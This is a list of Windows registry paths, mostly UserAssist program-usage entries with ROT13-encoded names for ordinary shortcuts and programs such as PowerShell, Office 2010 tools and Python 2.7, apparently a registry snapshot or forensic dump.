HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\Jvaqbjf Wbheany.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf CbjreFuryy Zbqhyrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Qvtvgny Pregvsvpngr sbe ION Cebwrpgf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Pyvc Betnavmre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr 2010 Ynathntr Cersreraprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr 2010 Hcybnq Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Zvpebfbsg Bssvpr Cvpgher Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bssvpr 2010 Gbbyf\Bssvpr Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\VQYR (Clguba THV).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\Zbqhyr Qbpf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 2.7\Clguba (pbzznaq yvar).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\abgrcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYPHNPbhag:pgbe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\aneengbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bfx.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\rhqprqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong.pbz\Npebong.pbz.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{Q4N262QQ-PR44-Q105-S36O-9Q77N8PO65N4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfNalgvzrHctenqrHV.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\QIQ Znxre\QIQZnxre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{NN198O3P-PQ8P-7QR1-98Q1-O460S637193O}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ArgCebw.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FbhaqErpbeqre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zboflap.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\puneznc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qsethv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pyrnazte.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P804OON7-SN5S-POS7-8O55-2096R5S972PO}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvasb32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\efgehv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\cbfgzvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\zvtjvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\FuncrPbyyrpgbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\GnoGvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf Wbheany\Wbheany.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbzrkc.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NOQ94SO-R7Q6-84N6-N997-P918RQQR0NR5}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bqopnq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OO044OSQ-25O7-2SNN-22N8-6371N93R0456}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\vfpfvpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ZqFpurq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NN47365-O2O3-1961-69RO-S866R376O12S}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\cevagznantrzrag.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OQ3S924R-55SO-N1ON-9QR6-O50S9S2460NP}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfpbasvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JS.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{15067OP1-P5N8-425R-37P6-SN0O891674S9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erpqvfp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfen.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxBssvprQvtvgnyFSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\ZFGBER.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxFrgYnathntrSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxJkcSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BVF.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\zvpebfbsg funerq\BSSVPR14\Bssvpr Frghc Pbagebyyre\cebzb.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{53123611-QN37-S8QN-SNP9-03R76QO9Q64Q}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba27\clguba.rkr
HKEY_CLASSES_ROOT\Applications\powershell.exe
